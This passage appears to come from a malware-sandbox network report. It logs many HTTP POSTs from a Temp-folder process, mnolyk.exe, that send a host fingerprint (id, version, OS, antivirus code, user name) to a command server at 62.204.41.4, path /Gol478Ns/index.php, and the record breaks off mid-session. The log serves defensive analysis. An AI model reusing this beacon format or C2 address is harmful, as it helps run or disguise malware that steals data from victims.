                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      690 | 192.168.2.7 | 50385 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:05.658909082 CET | 805 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.722368002 CET | 805 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      691 | 192.168.2.7 | 50386 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:05.891433001 CET | 806 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.956211090 CET | 806 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      692 | 192.168.2.7 | 50387 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:06.125158072 CET | 807 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.190597057 CET | 807 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      693 | 192.168.2.7 | 50388 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:06.372796059 CET | 808 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.436383963 CET | 808 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      694 | 192.168.2.7 | 50389 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:06.609150887 CET | 809 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.672586918 CET | 809 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      695 | 192.168.2.7 | 50390 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:06.856141090 CET | 810 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.920361042 CET | 810 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      696 | 192.168.2.7 | 50391 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:07.091831923 CET | 811 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.157641888 CET | 811 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      697 | 192.168.2.7 | 50392 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:07.350927114 CET | 812 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.414670944 CET | 812 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      698 | 192.168.2.7 | 50393 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:07.593302965 CET | 813 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.657994032 CET | 813 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      699 | 192.168.2.7 | 50394 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:07.826262951 CET | 814 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.891798019 CET | 814 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      7 | 192.168.2.7 | 49701 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:03.267556906 CET | 111 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.329868078 CET | 111 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      70 | 192.168.2.7 | 49765 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:19.352231026 CET | 185 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:19.415371895 CET | 185 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      700 | 192.168.2.7 | 50395 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:08.061096907 CET | 815 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.126143932 CET | 815 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      701 | 192.168.2.7 | 50396 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:08.320216894 CET | 816 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.385463953 CET | 816 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      702 | 192.168.2.7 | 50397 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:08.575838089 CET | 817 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.639832973 CET | 817 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      703 | 192.168.2.7 | 50398 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:08.813550949 CET | 818 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.877121925 CET | 818 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      704 | 192.168.2.7 | 50399 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:09.045856953 CET | 819 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.110275984 CET | 819 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      705 | 192.168.2.7 | 50400 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:09.283190966 CET | 820 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.347635984 CET | 820 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      706 | 192.168.2.7 | 50401 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:09.526189089 CET | 821 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
